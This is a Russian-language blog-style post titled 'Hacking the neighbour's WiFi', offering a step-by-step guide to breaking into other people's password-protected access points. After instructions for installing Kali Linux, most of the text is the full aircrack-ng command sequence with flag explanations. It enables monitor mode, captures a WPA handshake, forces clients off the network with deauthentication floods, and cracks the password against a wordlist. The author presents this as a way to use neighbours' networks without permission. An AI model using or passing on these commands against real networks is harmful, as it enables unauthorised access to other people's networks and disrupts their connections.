Взлом соседского Wifi
AbrahamСалют! Сегодня расскажу как пользоваться чужими, запароленными точками доступа.
Для начала у вас уже должен быть установлен дистрибутив Linux. Желательно kali linux, т.к в нем уже есть достаточно большой набор программ по взлому.
Для установки потребуется usb flesh от 4 gb
Сам дистрибутив, скачанный с оф сайта https://www.kali.org/downloads/
Программка по созданию загрузочной флешки https://unetbootin.github.io/
Скачиваем свежую версию unetbootin, впихиваем в него iso архив с системой. жмем создать.
Перезагружаемся, В биос выбираем загрузку с флешки, далее по шагам установщика.
Если возникнут проблемы, пишите мне. всегда помогу @LincolnAbraham
Не советую использовать через виртуалку. Будет достаточно много гемороя с оптимизацией работы отдельных программ.
Теперь у нас есть минимальный, хакерский набор.
Заходим в терминал и приступаем к взлому, вводя по очередности команды ( не забываем менять адреса, названия словарей и файлы с перехваченными рукопожатиями)
Взлом WIFI Aircrack-ng
airmon-ng check kill Остановить все процессы lan
airmon-ng start wlan0 Запуск режима мониторинг
airodump-ng wlan0mon мониторинг доступных точек
ловим рукопожатие
airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack wlan0mon --ignore-negative-one
-с канал сети
--bssid 00:11:22.... адрес точки доступа
-w название файла сохранения (по умолчанию в папку\root)
--ignore-negative-one Убирает сообщение ‘fixed channel : -1’
Заставляем отключится клиента
aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon --ignore-negative-one
или
aireplay-ng --deauth 100 -a 00:11:22:33:44:55 wlan0mon --ignore-negative-one
--deauth 100 Сколько deauth сообщений отправить (0 — без ограничений)
-a MAC адрес точки доступа
-c MAC адрес клиента (можно без клиента, но менее эфективно и более палевно)
wlan0mon Сетевой интерфейс
Ждем надписи в верхней строчки WPA handshake: 00:11:22:33:44:55
Подбор пароля по словарю
Указывать путь к словарю, можно просто перетаскивая в окно терминала
aircrack-ng -w '/usr/share/wordlists/rockyou.txt' -b 00:11:22:33:44:55 WPAcrack.cap
-w Путь к словарю с паролями (Перетягиваем в терминал любой текстовый фаил с паролями)
-b MAC адрес точки доступа
WPAcrack.cap Файл, содержащий перехваченное рукопожатие (Перетягиваем в терминал фаил с рукопожатием)
Если все успешно перебор паролей остановится и вы увидите его в центре окна терминала
По возникшим вопросам пишите, с радостью помогу и научу @LincolnAbraham